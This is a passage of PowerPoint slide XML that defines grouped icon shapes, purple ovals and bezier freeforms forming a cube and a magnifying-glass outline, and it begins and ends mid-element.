        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6308482" y="1732453"/>
            <a:ext cx="502928" cy="523220"/>
            <a:chOff x="6345238" y="966788"/>
            <a:chExt cx="1084263" cy="1084263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Oval 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896C5946-248D-D740-A48A-45C0FE99AED5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6345238" y="966788"/>
              <a:ext cx="1084263" cy="1084263"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="965BA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75" name="Freeform 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACC1BFF6-87BE-7240-BF34-CCC3BD948A2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6518275" y="1189038"/>
              <a:ext cx="885825" cy="852488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 140 w 516"/>
                <a:gd name="T1" fmla="*/ 0 h 497"/>
                <a:gd name="T2" fmla="*/ 134 w 516"/>
                <a:gd name="T3" fmla="*/ 1 h 497"/>
                <a:gd name="T4" fmla="*/ 93 w 516"/>
                <a:gd name="T5" fmla="*/ 25 h 497"/>
                <a:gd name="T6" fmla="*/ 39 w 516"/>
                <a:gd name="T7" fmla="*/ 57 h 497"/>
                <a:gd name="T8" fmla="*/ 9 w 516"/>
                <a:gd name="T9" fmla="*/ 81 h 497"/>
                <a:gd name="T10" fmla="*/ 7 w 516"/>
                <a:gd name="T11" fmla="*/ 177 h 497"/>
                <a:gd name="T12" fmla="*/ 23 w 516"/>
                <a:gd name="T13" fmla="*/ 240 h 497"/>
                <a:gd name="T14" fmla="*/ 278 w 516"/>
                <a:gd name="T15" fmla="*/ 497 h 497"/>
                <a:gd name="T16" fmla="*/ 516 w 516"/>
                <a:gd name="T17" fmla="*/ 282 h 497"/>
                <a:gd name="T18" fmla="*/ 411 w 516"/>
                <a:gd name="T19" fmla="*/ 177 h 497"/>
                <a:gd name="T20" fmla="*/ 379 w 516"/>
                <a:gd name="T21" fmla="*/ 145 h 497"/>
                <a:gd name="T22" fmla="*/ 346 w 516"/>
                <a:gd name="T23" fmla="*/ 118 h 497"/>
                <a:gd name="T24" fmla="*/ 294 w 516"/>
                <a:gd name="T25" fmla="*/ 97 h 497"/>
                <a:gd name="T26" fmla="*/ 161 w 516"/>
                <a:gd name="T27" fmla="*/ 9 h 497"/>
                <a:gd name="T28" fmla="*/ 140 w 516"/>
                <a:gd name="T29" fmla="*/ 0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6" h="497">
                  <a:moveTo>
                    <a:pt x="140" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="0"/>
                    <a:pt x="136" y="0"/>
                    <a:pt x="134" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="9"/>
                    <a:pt x="107" y="17"/>
                    <a:pt x="93" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="35"/>
                    <a:pt x="57" y="46"/>
                    <a:pt x="39" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="61"/>
                    <a:pt x="9" y="69"/>
                    <a:pt x="9" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="106"/>
                    <a:pt x="7" y="149"/>
                    <a:pt x="7" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="203"/>
                    <a:pt x="3" y="222"/>
                    <a:pt x="23" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="271"/>
                    <a:pt x="193" y="413"/>
                    <a:pt x="278" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="474"/>
                    <a:pt x="482" y="391"/>
                    <a:pt x="516" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468" y="234"/>
                    <a:pt x="426" y="192"/>
                    <a:pt x="411" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="167"/>
                    <a:pt x="389" y="156"/>
                    <a:pt x="379" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="135"/>
                    <a:pt x="358" y="125"/>
                    <a:pt x="346" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="107"/>
                    <a:pt x="309" y="110"/>
                    <a:pt x="294" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="56"/>
                    <a:pt x="205" y="35"/>
                    <a:pt x="161" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="5"/>
                    <a:pt x="147" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="77498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76" name="Freeform 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{196B338E-6C2F-184A-A72E-03334E2A671F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6943725" y="1446213"/>
              <a:ext cx="39688" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 23"/>
                <a:gd name="T1" fmla="*/ 33 h 84"/>
                <a:gd name="T2" fmla="*/ 0 w 23"/>
                <a:gd name="T3" fmla="*/ 62 h 84"/>
                <a:gd name="T4" fmla="*/ 6 w 23"/>
                <a:gd name="T5" fmla="*/ 76 h 84"/>
                <a:gd name="T6" fmla="*/ 11 w 23"/>
                <a:gd name="T7" fmla="*/ 84 h 84"/>
                <a:gd name="T8" fmla="*/ 18 w 23"/>
                <a:gd name="T9" fmla="*/ 80 h 84"/>
                <a:gd name="T10" fmla="*/ 23 w 23"/>
                <a:gd name="T11" fmla="*/ 69 h 84"/>
                <a:gd name="T12" fmla="*/ 23 w 23"/>
                <a:gd name="T13" fmla="*/ 0 h 84"/>
                <a:gd name="T14" fmla="*/ 0 w 23"/>
                <a:gd name="T15" fmla="*/ 33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84">
                  <a:moveTo>
                    <a:pt x="0" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="67"/>
                    <a:pt x="3" y="72"/>
                    <a:pt x="6" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="79"/>
                    <a:pt x="9" y="82"/>
                    <a:pt x="11" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="80"/>
                    <a:pt x="18" y="80"/>
                    <a:pt x="18" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="78"/>
                    <a:pt x="23" y="74"/>
                    <a:pt x="23" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="7"/>
                    <a:pt x="3" y="19"/>
                    <a:pt x="0"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77" name="Freeform 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2902157A-D799-F645-9CE4-84C5AB7CB0B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6530975" y="1187450"/>
              <a:ext cx="455613" cy="517525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 266"/>
                <a:gd name="T1" fmla="*/ 236 h 302"/>
                <a:gd name="T2" fmla="*/ 145 w 266"/>
                <a:gd name="T3" fmla="*/ 269 h 302"/>
                <a:gd name="T4" fmla="*/ 145 w 266"/>
                <a:gd name="T5" fmla="*/ 158 h 302"/>
                <a:gd name="T6" fmla="*/ 241 w 266"/>
                <a:gd name="T7" fmla="*/ 103 h 302"/>
                <a:gd name="T8" fmla="*/ 241 w 266"/>
                <a:gd name="T9" fmla="*/ 114 h 302"/>
                <a:gd name="T10" fmla="*/ 244 w 266"/>
                <a:gd name="T11" fmla="*/ 112 h 302"/>
                <a:gd name="T12" fmla="*/ 264 w 266"/>
                <a:gd name="T13" fmla="*/ 103 h 302"/>
                <a:gd name="T14" fmla="*/ 264 w 266"/>
                <a:gd name="T15" fmla="*/ 82 h 302"/>
                <a:gd name="T16" fmla="*/ 266 w 266"/>
                <a:gd name="T17" fmla="*/ 82 h 302"/>
                <a:gd name="T18" fmla="*/ 260 w 266"/>
                <a:gd name="T19" fmla="*/ 72 h 302"/>
                <a:gd name="T20" fmla="*/ 140 w 266"/>
                <a:gd name="T21" fmla="*/ 2 h 302"/>
                <a:gd name="T22" fmla="*/ 128 w 266"/>
                <a:gd name="T23" fmla="*/ 2 h 302"/>
                <a:gd name="T24" fmla="*/ 8 w 266"/>
                <a:gd name="T25" fmla="*/ 72 h 302"/>
                <a:gd name="T26" fmla="*/ 2 w 266"/>
                <a:gd name="T27" fmla="*/ 82 h 302"/>
                <a:gd name="T28" fmla="*/ 0 w 266"/>
                <a:gd name="T29" fmla="*/ 82 h 302"/>
                <a:gd name="T30" fmla="*/ 0 w 266"/>
                <a:gd name="T31" fmla="*/ 220 h 302"/>
                <a:gd name="T32" fmla="*/ 7 w 266"/>
                <a:gd name="T33" fmla="*/ 231 h 302"/>
                <a:gd name="T34" fmla="*/ 127 w 266"/>
                <a:gd name="T35" fmla="*/ 300 h 302"/>
                <a:gd name="T36" fmla="*/ 128 w 266"/>
                <a:gd name="T37" fmla="*/ 300 h 302"/>
                <a:gd name="T38" fmla="*/ 134 w 266"/>
                <a:gd name="T39" fmla="*/ 302 h 302"/>
                <a:gd name="T40" fmla="*/ 140 w 266"/>
                <a:gd name="T41" fmla="*/ 300 h 302"/>
                <a:gd name="T42" fmla="*/ 213 w 266"/>
                <a:gd name="T43" fmla="*/ 258 h 302"/>
                <a:gd name="T44" fmla="*/ 208 w 266"/>
                <a:gd name="T45" fmla="*/ 249 h 302"/>
                <a:gd name="T46" fmla="*/ 202 w 266"/>
                <a:gd name="T47" fmla="*/ 236 h 302"/>
                <a:gd name="T48" fmla="*/ 119 w 266"/>
                <a:gd name="T49" fmla="*/ 269 h 302"/>
                <a:gd name="T50" fmla="*/ 24 w 266"/>
                <a:gd name="T51" fmla="*/ 213 h 302"/>
                <a:gd name="T52" fmla="*/ 24 w 266"/>
                <a:gd name="T53" fmla="*/ 103 h 302"/>
                <a:gd name="T54" fmla="*/ 119 w 266"/>
                <a:gd name="T55" fmla="*/ 158 h 302"/>
                <a:gd name="T56" fmla="*/ 119 w 266"/>
                <a:gd name="T57" fmla="*/ 269 h 302"/>
                <a:gd name="T58" fmla="*/ 134 w 266"/>
                <a:gd name="T59" fmla="*/ 137 h 302"/>
                <a:gd name="T60" fmla="*/ 38 w 266"/>
                <a:gd name="T61" fmla="*/ 82 h 302"/>
                <a:gd name="T62" fmla="*/ 134 w 266"/>
                <a:gd name="T63" fmla="*/ 26 h 302"/>
                <a:gd name="T64" fmla="*/ 230 w 266"/>
                <a:gd name="T65" fmla="*/ 82 h 302"/>
                <a:gd name="T66" fmla="*/ 134 w 266"/>
                <a:gd name="T67" fmla="*/ 13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6" h="302">
                  <a:moveTo>
                    <a:pt x="202" y="236"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="269"/>
                    <a:pt x="145" y="269"/>
                    <a:pt x="145" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="158"/>
                    <a:pt x="145" y="158"/>
                    <a:pt x="145" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="103"/>
                    <a:pt x="241" y="103"/>
                    <a:pt x="241" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="114"/>
                    <a:pt x="241" y="114"/>
                    <a:pt x="241" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="113"/>
                    <a:pt x="243" y="113"/>
                    <a:pt x="244" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="108"/>
                    <a:pt x="259" y="105"/>
                    <a:pt x="264" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="82"/>
                    <a:pt x="264" y="82"/>
                    <a:pt x="264" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="82"/>
                    <a:pt x="266" y="82"/>
                    <a:pt x="266" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="79"/>
                    <a:pt x="264" y="74"/>
                    <a:pt x="260" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="2"/>
                    <a:pt x="140" y="2"/>
                    <a:pt x="140" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="0"/>
                    <a:pt x="132" y="0"/>
                    <a:pt x="128" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="72"/>
                    <a:pt x="8" y="72"/>
                    <a:pt x="8" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="74"/>
                    <a:pt x="2" y="79"/>
                    <a:pt x="2" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="82"/>
                    <a:pt x="0" y="82"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="225"/>
                    <a:pt x="3" y="229"/>
                    <a:pt x="7" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="300"/>
                    <a:pt x="127" y="300"/>
                    <a:pt x="127" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="300"/>
                    <a:pt x="128" y="300"/>
                    <a:pt x="128" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="301"/>
                    <a:pt x="132" y="302"/>
                    <a:pt x="134" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="302"/>
                    <a:pt x="138" y="301"/>
                    <a:pt x="140" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="258"/>
                    <a:pt x="213" y="258"/>
                    <a:pt x="213" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="255"/>
                    <a:pt x="210" y="252"/>
                    <a:pt x="208" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="245"/>
                    <a:pt x="203" y="241"/>
                    <a:pt x="202" y="236"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="119" y="269"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="213"/>
                    <a:pt x="24" y="213"/>
                    <a:pt x="24" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="103"/>
                    <a:pt x="24" y="103"/>
                    <a:pt x="24" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="158"/>
                    <a:pt x="119" y="158"/>
                    <a:pt x="119" y="158"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="269"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="82"/>
                    <a:pt x="38" y="82"/>
                    <a:pt x="38" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="26"/>
                    <a:pt x="134" y="26"/>
                    <a:pt x="134" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="82"/>
                    <a:pt x="230" y="82"/>
                    <a:pt x="230" y="82"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="13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78" name="Freeform 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC70970-4224-1541-A33F-65FD27E99448}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6856413" y="1347788"/>
              <a:ext cx="352425" cy="412750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 171 w 205"/>
                <a:gd name="T1" fmla="*/ 167 h 241"/>
                <a:gd name="T2" fmla="*/ 184 w 205"/>
                <a:gd name="T3" fmla="*/ 58 h 241"/>
                <a:gd name="T4" fmla="*/ 59 w 205"/>
                <a:gd name="T5" fmla="*/ 26 h 241"/>
                <a:gd name="T6" fmla="*/ 26 w 205"/>
                <a:gd name="T7" fmla="*/ 151 h 241"/>
                <a:gd name="T8" fmla="*/ 128 w 205"/>
                <a:gd name="T9" fmla="*/ 193 h 241"/>
                <a:gd name="T10" fmla="*/ 157 w 205"/>
                <a:gd name="T11" fmla="*/ 241 h 241"/>
                <a:gd name="T12" fmla="*/ 199 w 205"/>
                <a:gd name="T13" fmla="*/ 216 h 241"/>
                <a:gd name="T14" fmla="*/ 171 w 205"/>
                <a:gd name="T15" fmla="*/ 167 h 241"/>
                <a:gd name="T16" fmla="*/ 138 w 205"/>
                <a:gd name="T17" fmla="*/ 161 h 241"/>
                <a:gd name="T18" fmla="*/ 48 w 205"/>
                <a:gd name="T19" fmla="*/ 138 h 241"/>
                <a:gd name="T20" fmla="*/ 72 w 205"/>
                <a:gd name="T21" fmla="*/ 48 h 241"/>
                <a:gd name="T22" fmla="*/ 162 w 205"/>
                <a:gd name="T23" fmla="*/ 71 h 241"/>
                <a:gd name="T24" fmla="*/ 138 w 205"/>
                <a:gd name="T25" fmla="*/ 16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41">
                  <a:moveTo>
                    <a:pt x="171" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="139"/>
                    <a:pt x="205" y="94"/>
                    <a:pt x="184" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="15"/>
                    <a:pt x="102" y="0"/>
                    <a:pt x="59" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="51"/>
                    <a:pt x="0" y="107"/>
                    <a:pt x="26" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="187"/>
                    <a:pt x="91" y="202"/>
                    <a:pt x="128" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="241"/>
                    <a:pt x="157" y="241"/>
                    <a:pt x="157" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="235"/>
                    <a:pt x="187" y="226"/>
                    <a:pt x="199" y="216"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="171" y="167"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="138" y="161"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="179"/>
                    <a:pt x="67" y="169"/>
                    <a:pt x="48" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="106"/>
                    <a:pt x="41" y="66"/>
                    <a:pt x="72" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="30"/>
                    <a:pt x="143" y="40"/>
                    <a:pt x="162" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="102"/>
                    <a:pt x="169" y="143"/>
                    <a:pt x="138" y="16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79" name="Freeform 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAAA993-34A9-FD4B-B517-2B5F38DCEB87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7138988" y="1744663"/>
              <a:ext cx="106363" cy="100013"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 59 w 62"/>
                <a:gd name="T1" fmla="*/ 27 h 59"/>
                <a:gd name="T2" fmla="*/ 43 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 59"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 25 h 59"/>
                <a:gd name="T6" fmla="*/ 16 w 62"/>
                <a:gd name="T7" fmla="*/ 52 h 59"/>
                <a:gd name="T8" fmla="*/ 34 w 62"/>
                <a:gd name="T9" fmla="*/ 55 h 59"/>
                <a:gd name="T10" fmla="*/ 54 w 62"/>
                <a:gd name="T11" fmla="*/ 44 h 59"/>
                <a:gd name="T12" fmla="*/ 59 w 62"/>
                <a:gd name="T13" fmla="*/ 27 h 59"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="59">
                  <a:moveTo>
                    <a:pt x="59" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="0"/>
                    <a:pt x="43" y="0"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="10"/>
                    <a:pt x="15" y="19"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="52"/>
                    <a:pt x="16" y="52"/>
                    <a:pt x="16" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="57"/>
                    <a:pt x="28" y="59"/>
                    <a:pt x="34" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="44"/>
                    <a:pt x="54" y="44"/>
                    <a:pt x="54" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="40"/>
                    <a:pt x="62" y="32"/>
                    <a:pt x="59" y="2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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="组合 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD0B573-0BDC-7242-8CB5-C9A31D6953C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6308482" y="4780727"/>
            <a:ext cx="502929" cy="517784"/>
            <a:chOff x="3182938" y="2435225"/>
            <a:chExt cx="1085850" cy="1084263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Oval 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6453542-408B-CE4E-ADA1-C4FDEA62EC0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3182938" y="2435225"/>
              <a:ext cx="1085850" cy="1084263"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="965BA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82" name="Freeform 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A6F800-52A2-7843-9CBB-59F1DCE74E8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3727450" y="3513138"/>
              <a:ext cx="71438" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 42"/>
                <a:gd name="T1" fmla="*/ 3 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 42"/>
                <a:gd name="T3" fmla="*/ 3 h 3"/>
                <a:gd name="T4" fmla="*/ 2 w 42"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 3 w 42"/>
                <a:gd name="T7" fmla="*/ 3 h 3"/>
                <a:gd name="T8" fmla="*/ 3 w 42"/>
                <a:gd name="T9" fmla="*/ 3 h 3"/>
                <a:gd name="T10" fmla="*/ 4 w 42"/>
                <a:gd name="T11" fmla="*/ 3 h 3"/>
                <a:gd name="T12" fmla="*/ 5 w 42"/>
                <a:gd name="T13" fmla="*/ 3 h 3"/>
                <a:gd name="T14" fmla="*/ 5 w 42"/>
                <a:gd name="T15" fmla="*/ 3 h 3"/>
                <a:gd name="T16" fmla="*/ 6 w 42"/>
                <a:gd name="T17" fmla="*/ 3 h 3"/>
                <a:gd name="T18" fmla="*/ 7 w 42"/>
                <a:gd name="T19" fmla="*/ 3 h 3"/>
                <a:gd name="T20" fmla="*/ 7 w 42"/>
                <a:gd name="T21" fmla="*/ 3 h 3"/>
                <a:gd name="T22" fmla="*/ 8 w 42"/>
                <a:gd name="T23" fmla="*/ 3 h 3"/>
                <a:gd name="T24" fmla="*/ 9 w 42"/>
                <a:gd name="T25" fmla="*/ 3 h 3"/>
                <a:gd name="T26" fmla="*/ 9 w 42"/>
                <a:gd name="T27" fmla="*/ 3 h 3"/>
                <a:gd name="T28" fmla="*/ 10 w 42"/>
                <a:gd name="T29" fmla="*/ 3 h 3"/>
                <a:gd name="T30" fmla="*/ 11 w 42"/>
                <a:gd name="T31" fmla="*/ 3 h 3"/>
                <a:gd name="T32" fmla="*/ 11 w 42"/>
                <a:gd name="T33" fmla="*/ 3 h 3"/>
                <a:gd name="T34" fmla="*/ 12 w 42"/>
                <a:gd name="T35" fmla="*/ 3 h 3"/>
                <a:gd name="T36" fmla="*/ 13 w 42"/>
                <a:gd name="T37" fmla="*/ 3 h 3"/>
                <a:gd name="T38" fmla="*/ 13 w 42"/>
                <a:gd name="T39" fmla="*/ 3 h 3"/>
